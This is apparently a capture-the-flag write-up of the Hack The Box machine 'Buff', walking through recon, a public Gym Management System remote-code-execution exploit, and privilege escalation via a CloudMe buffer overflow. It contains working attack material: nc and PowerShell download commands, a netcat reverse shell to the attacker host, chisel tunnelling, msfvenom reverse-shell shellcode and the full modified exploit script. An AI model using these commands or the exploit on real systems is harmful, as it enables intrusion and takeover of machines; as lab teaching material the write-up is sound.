Buff is a quite easy box highlighting basics of enumeration, where we discover a website running a vulnerable software and exploit it using a publicly available exploit to a get remote code execution on the box. For elevating privileges to root, we’ll find another service listening on localhost, then port forward to establish a connection with the service and exploit it using a public exploit by updating the shell code of Buffer Overflow exploit to spawn a reverse shell as Administrator.
Reconnaissance
masscan
Starting off with masscan we discover two TCP ports 7680 and 8080:
1
2
3
4
5
6
7
8
9
cfx: ~/Documents/htb/buff
→ masscan -e tun0 -p1-65535,U:1-65535 --rate 500 10.10.10.198 | tee masscan.ports
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-11-13 14:39:42 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 7680/tcp on 10.10.10.198
Discovered open port 8080/tcp on 10.10.10.198
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cfx: ~/Documents/htb/buff
→ nmap -sC -sV -p7680,8080 10.10.10.198
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-13 20:38 IST
Nmap scan report for 10.10.10.198
Host is up (0.087s latency).
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.58 seconds
Port scan summary:
- Port 7680: Pando Media Public Distribution
- Port 8080: HTTP Server hosting a site named mrb3n’s Bro Hut
Port 8080: Website
Home page indicates it’s a Gym website:
There are multiple functional links on site describing Gym membership and facilities stuff.
However, contact page present the name of the Software or framework used to make this website.
Gym Management System - Exploit
On searching for Gym Management system exploit, we come across an Unauthenticated RCE exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
cfx: ~/Documents/htb/buff
→ searchsploit Gym
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
Mirroring the exploit to local machine
1
2
3
4
5
6
7
8
cfx: ~/Documents/htb/buff
→ searchsploit -m php/webapps/48506.py
Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
URL: https://www.exploit-db.com/exploits/48506
Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /root/Documents/htb/buff/48506.py
Shell as shaun
Psuedo Shell
The exploit is pretty straight forward and only expects a single argument which is the host url. It basically drops a web shell named kamehameha bypassing the image upload functionality of the software.
Exploit is written in python2 and makes use of colorma module which can be installed using pip install colorma if in case it’s not present on the machine.
1
2
3
4
5
6
7
8
9
10
11
12
cfx: ~/Documents/htb/buff
→ python2 48506.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun
On every output, we see Magic bytes of a PNG file used to bypass the image upload filter also the shell is bit unstable, not letting us to change directory so let’s transfer nc on the box and get a upgraded powershell.
Upgraded Shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
C:\xampp\htdocs\gym\upload> powershell iwr -uri http://10.10.14.24/nc.exe -o nc.exe
�PNG
C:\xampp\htdocs\gym\upload> dir
�PNG
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
13/11/2020 05:26 <DIR> .
13/11/2020 05:26 <DIR> ..
13/11/2020 05:26 53 kamehameha.php
12/11/2020 10:48 38,616 nc.exe
3 File(s) 510,733 bytes
2 Dir(s) 9,800,810,496 bytes free
Executing nc to get a powershell reverse shell
1
C:\xampp\htdocs\gym\upload> nc 10.10.14.20 8020 -e powershell.exe
Getting a call back on the listener
1
2
3
4
5
6
7
8
9
10
11
12
13
cfx: ~/Documents/htb/buff
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 10.10.10.198.
Ncat: Connection from 10.10.10.198:49739.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\gym\upload> whoami
whoami
buff\shaun
Grabbing user.txt
1
2
3
PS C:\Users\shaun\Desktop> get-content user.txt
get-content user.txt
7e6ceb18e6a59df3e31797b97d07d6c9
Elevating Priv: shaun -> administrator
Enumeration
Going through shaun’s directory we find CloudMe_1112.exe inside Downloads. We’ve used tree /f which gives tree structure of the directory including all the files inside subfolders.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
PS C:\Users\shaun> tree /f
tree /f
Folder PATH listing
Volume serial number is A22D-49F7
C:.
3D Objects
Contacts
Desktop
user.txt
Documents
Tasks.bat
winpeas.exe
Downloads
CloudMe_1112.exe
Favorites
Bing.url
Links
Links
Desktop.lnk
Downloads.lnk
Music
OneDrive
Pictures
Camera Roll
Saved Pictures
Saved Games
Searches
winrt--{S-1-5-21-2277156429-3381729605-2640630771-1001}-.searchconnector-ms
Videos
Netstat
On running netstat we see port 3306 and 8888 listening on localhost. It’s pretty obvious 3306 is MySQL but 8888 is unknown:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
PS C:\> netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5804
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 8812
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 3680
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 528
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1104
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1528
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2128
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 680
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.198:8080 10.10.14.10:59004 ESTABLISHED 3680
TCP 10.10.10.198:8080 10.10.14.24:49934 ESTABLISHED 3680
TCP 10.10.10.198:49732 10.10.14.10:9999 ESTABLISHED 8604
TCP 10.10.10.198:49739 10.10.14.24:8020 ESTABLISHED 3464
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 2840
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 7888
TCP [::]:135 [::]:0 LISTENING 952
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 8812
TCP [::]:8080 [::]:0 LISTENING 3680
[..SNIP..]
We can get the name of the process listening on Port 8888 using a simple powershell command:
1
2
3
4
5
6
PS C:\> Get-Process -Id (Get-NetTCPConnection -LocalPort 8888).OwningProcess
Get-Process -Id (Get-NetTCPConnection -LocalPort 8888).OwningProcess
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
364 25 33828 38748 2924 0 CloudMe
It’s CloudMe running on Port 8888, same thing we saw in Downloads folder. This definitely creates suspicion.
CloudMe Exploit
On searching with searchsploit, we get multiple vulnerabilities on Buffer Overflow.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
cfx: ~/Documents/htb/buff
→ searchsploit CloudMe
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
First two exploit resembles the same version as we saw in Buff’s Downloads which was CloudMe_1112.exe, we’ll use the first one and copy it our machine using searchsploit -m windows/remote/48389.py
Port-Forwarding
Traditionally to exploit buffer overflows we’ll transfer & run the exploit within the box. Here since it’s a windows machine and Python isn’t installed by default so we’ll create a tunnel from our box to Buff using chisel and exploit this service.
Step1 : Transfer chisel.exe to Buff
1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\Users\shaun\Documents> iwr -uri http://10.10.14.20:8000/chisel.exe -o chisel.exe
iwr -uri http://10.10.14.20:8000/chisel.exe -o chisel.exe
PS C:\Users\shaun\Documents> ls
ls
Directory: C:\Users\shaun\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 13/11/2020 16:51 8814592 chisel.exe
-a---- 16/06/2020 22:26 30 Tasks.bat
-a---- 13/11/2020 16:17 472064 winpeas.exe
First we’ll host a python server on our machine and since we are already in a powershell we’ll make use iwr (Invoke-WebRequest) and uri to transfer the exe.
Step2 : Executing chisel in server mode on our machine (Kali)
1
2
3
4
5
6
cfx: ~/Documents/htb/buff
→ ./chisel server -p 9001 -reverse
2020/11/13 23:03:21 server: Reverse tunnelling enabled
2020/11/13 23:03:21 server: Fingerprint 1a:53:38:1d:95:4d:8a:41:72:63:57:46:d5:67:dd:0e
2020/11/13 23:03:21 server: Listening on http://0.0.0.0:9001
2020/11/13 23:03:23 server: session#1: tun: proxy#R:8888=>8888: Listening
Step3 : Running chisel on Buff in client mode
1
2
3
4
5
6
7
PS C:\Users\shaun\Documents> .\chisel.exe client 10.10.14.20:9001 R:8888:127.0.0.1:8888
.\chisel.exe client 10.10.14.20:9001 R:8888:127.0.0.1:8888
2020/11/13 17:30:15 client: Connecting to ws://10.10.14.20:9001
2020/11/13 17:30:16 client: Fingerprint b5:68:ef:99:75:54:cd:e2:04:eb:40:64:ba:af:fa:0f
2020/11/13 17:30:16 client: Connected (Latency 190.6329ms)
2020/11/13 17:33:21 client: Fingerprint 1a:53:38:1d:95:4d:8a:41:72:63:57:46:d5:67:dd:0e
2020/11/13 17:33:22 client: Connected (Latency 211.4254ms)
Port 8888 Listening on our machine
1
2
3
4
5
6
7
8
cfx: ~/Documents/htb/buff
→ ss -tnlp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 0 0.0.0.0:8020 0.0.0.0:* users:(("pwncat",pid=7463,fd=4))
LISTEN 0 128 0.0.0.0:111 0.0.0.0:* users:(("rpcbind",pid=3276,fd=7))
LISTEN 0 0 [::]:8020 [::]:* users:(("pwncat",pid=7463,fd=3))
LISTEN 0 4096 *:8888 *:* users:(("chisel",pid=12191,fd=8))
LISTEN 0 4096 *:9001 *:* users:(("chisel",pid=12191,fd=6))
CloudMe Exploit
Going through the Exploit, it appears PoC was originally designed to open up calculator through code execution, We’ll modify the payload the by generating a shellcode to give us a reverse shell using msfvenom
Generating Shellcode
With reference to Original PoC, we’ll just change the payload type and also include the -v payload which sets the output payload variable name making it easy to the replace the shellcode in the script.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
cfx: ~/Documents/htb/buff
→ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=1337 -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
payload = b""
payload += b"\xdb\xd8\xb8\x2b\x66\x7d\x94\xd9\x74\x24\xf4\x5d"
payload += b"\x29\xc9\xb1\x52\x31\x45\x17\x83\xc5\x04\x03\x6e"
payload += b"\x75\x9f\x61\x8c\x91\xdd\x8a\x6c\x62\x82\x03\x89"
payload += b"\x53\x82\x70\xda\xc4\x32\xf2\x8e\xe8\xb9\x56\x3a"
payload += b"\x7a\xcf\x7e\x4d\xcb\x7a\x59\x60\xcc\xd7\x99\xe3"
payload += b"\x4e\x2a\xce\xc3\x6f\xe5\x03\x02\xb7\x18\xe9\x56"
payload += b"\x60\x56\x5c\x46\x05\x22\x5d\xed\x55\xa2\xe5\x12"
payload += b"\x2d\xc5\xc4\x85\x25\x9c\xc6\x24\xe9\x94\x4e\x3e"
payload += b"\xee\x91\x19\xb5\xc4\x6e\x98\x1f\x15\x8e\x37\x5e"
payload += b"\x99\x7d\x49\xa7\x1e\x9e\x3c\xd1\x5c\x23\x47\x26"
payload += b"\x1e\xff\xc2\xbc\xb8\x74\x74\x18\x38\x58\xe3\xeb"
payload += b"\x36\x15\x67\xb3\x5a\xa8\xa4\xc8\x67\x21\x4b\x1e"
payload += b"\xee\x71\x68\xba\xaa\x22\x11\x9b\x16\x84\x2e\xfb"
payload += b"\xf8\x79\x8b\x70\x14\x6d\xa6\xdb\x71\x42\x8b\xe3"
payload += b"\x81\xcc\x9c\x90\xb3\x53\x37\x3e\xf8\x1c\x91\xb9"
payload += b"\xff\x36\x65\x55\xfe\xb8\x96\x7c\xc5\xed\xc6\x16"
payload += b"\xec\x8d\x8c\xe6\x11\x58\x02\xb6\xbd\x33\xe3\x66"
payload += b"\x7e\xe4\x8b\x6c\x71\xdb\xac\x8f\x5b\x74\x46\x6a"
payload += b"\x0c\x71\x9d\x7a\xd8\xed\xa3\x82\xe5\xd4\x2a\x64"
payload += b"\x8f\x36\x7b\x3f\x38\xae\x26\xcb\xd9\x2f\xfd\xb6"
payload += b"\xda\xa4\xf2\x47\x94\x4c\x7e\x5b\x41\xbd\x35\x01"
payload += b"\xc4\xc2\xe3\x2d\x8a\x51\x68\xad\xc5\x49\x27\xfa"
payload += b"\x82\xbc\x3e\x6e\x3f\xe6\xe8\x8c\xc2\x7e\xd2\x14"
payload += b"\x19\x43\xdd\x95\xec\xff\xf9\x85\x28\xff\x45\xf1"
payload += b"\xe4\x56\x10\xaf\x42\x01\xd2\x19\x1d\xfe\xbc\xcd"
payload += b"\xd8\xcc\x7e\x8b\xe4\x18\x09\x73\x54\xf5\x4c\x8c"
payload += b"\x59\x91\x58\xf5\x87\x01\xa6\x2c\x0c\x31\xed\x6c"
payload += b"\x25\xda\xa8\xe5\x77\x87\x4a\xd0\xb4\xbe\xc8\xd0"
payload += b"\x44\x45\xd0\x91\x41\x01\x56\x4a\x38\x1a\x33\x6c"
payload += b"\xef\x1b\x16
Final Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=1337 -b '\x00\x0A\x0D' -f python -v payload
payload = b""
payload += b"\xdb\xd8\xb8\x2b\x66\x7d\x94\xd9\x74\x24\xf4\x5d"
payload += b"\x29\xc9\xb1\x52\x31\x45\x17\x83\xc5\x04\x03\x6e"
payload += b"\x75\x9f\x61\x8c\x91\xdd\x8a\x6c\x62\x82\x03\x89"
payload += b"\x53\x82\x70\xda\xc4\x32\xf2\x8e\xe8\xb9\x56\x3a"
payload += b"\x7a\xcf\x7e\x4d\xcb\x7a\x59\x60\xcc\xd7\x99\xe3"
payload += b"\x4e\x2a\xce\xc3\x6f\xe5\x03\x02\xb7\x18\xe9\x56"
payload += b"\x60\x56\x5c\x46\x05\x22\x5d\xed\x55\xa2\xe5\x12"
payload += b"\x2d\xc5\xc4\x85\x25\x9c\xc6\x24\xe9\x94\x4e\x3e"
payload += b"\xee\x91\x19\xb5\xc4\x6e\x98\x1f\x15\x8e\x37\x5e"
payload += b"\x99\x7d\x49\xa7\x1e\x9e\x3c\xd1\x5c\x23\x47\x26"
payload += b"\x1e\xff\xc2\xbc\xb8\x74\x74\x18\x38\x58\xe3\xeb"
payload += b"\x36\x15\x67\xb3\x5a\xa8\xa4\xc8\x67\x21\x4b\x1e"
payload += b"\xee\x71\x68\xba\xaa\x22\x11\x9b\x16\x84\x2e\xfb"
payload += b"\xf8\x79\x8b\x70\x14\x6d\xa6\xdb\x71\x42\x8b\xe3"
payload += b"\x81\xcc\x9c\x90\xb3\x53\x37\x3e\xf8\x1c\x91\xb9"
payload += b"\xff\x36\x65\x55\xfe\xb8\x96\x7c\xc5\xed\xc6\x16"
payload += b"\xec\x8d\x8c\xe6\x11\x58\x02\xb6\xbd\x33\xe3\x66"
payload += b"\x7e\xe4\x8b\x6c\x71\xdb\xac\x8f\x5b\x74\x46\x6a"
payload += b"\x0c\x71\x9d\x7a\xd8\xed\xa3\x82\xe5\xd4\x2a\x64"
payload += b"\x8f\x36\x7b\x3f\x38\xae\x26\xcb\xd9\x2f\xfd\xb6"
payload += b"\xda\xa4\xf2\x47\x94\x4c\x7e\x5b\x41\xbd\x35\x01"
payload += b"\xc4\xc2\xe3\x2d\x8a\x51\x68\xad\xc5\x49\x27\xfa"
payload += b"\x82\xbc\x3e\x6e\x3f\xe6\xe8\x8c\xc2\x7e\xd2\x14"
payload += b"\x19\x43\xdd\x95\xec\xff\xf9\x85\x28\xff\x45\xf1"
payload += b"\xe4\x56\x10\xaf\x42\x01\xd2\x19\x1d\xfe\xbc\xcd"
payload += b"\xd8\xcc\x7e\x8b\xe4\x18\x09\x73\x54\xf5\x4c\x8c"
payload += b"\x59\x91\x58\xf5\x87\x01\xa6\x2c\x0c\x31\xed\x6c"
payload += b"\x25\xda\xa8\xe5\x77\x87\x4a\xd0\xb4\xbe\xc8\xd0"
payload += b"\x44\x45\xd0\x91\x41\x01\x56\x4a\x38\x1a\x33\x6c"
payload += b"\xef\x1b\x16"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
Shell as Administrator
Running Exploit
1
2
cfx: ~/Documents/htb/buff
→ python2 48389.py
Callback on nc listener
1
2
3
4
5
6
7
8
9
10
11
12
13
cfx: ~/Documents/htb/buff
→ nc -lvnp 1337
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.198.
Ncat: Connection from 10.10.10.198:49796.
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
Grabbing root.txt
1
2
3
C:\Users\Administrator\Desktop>type root.txt
type root.txt
acd28cb017981863006b0ff9796bdf54
And we pwned the Box !
Thanks for reading, Suggestions & Feedback are appreciated !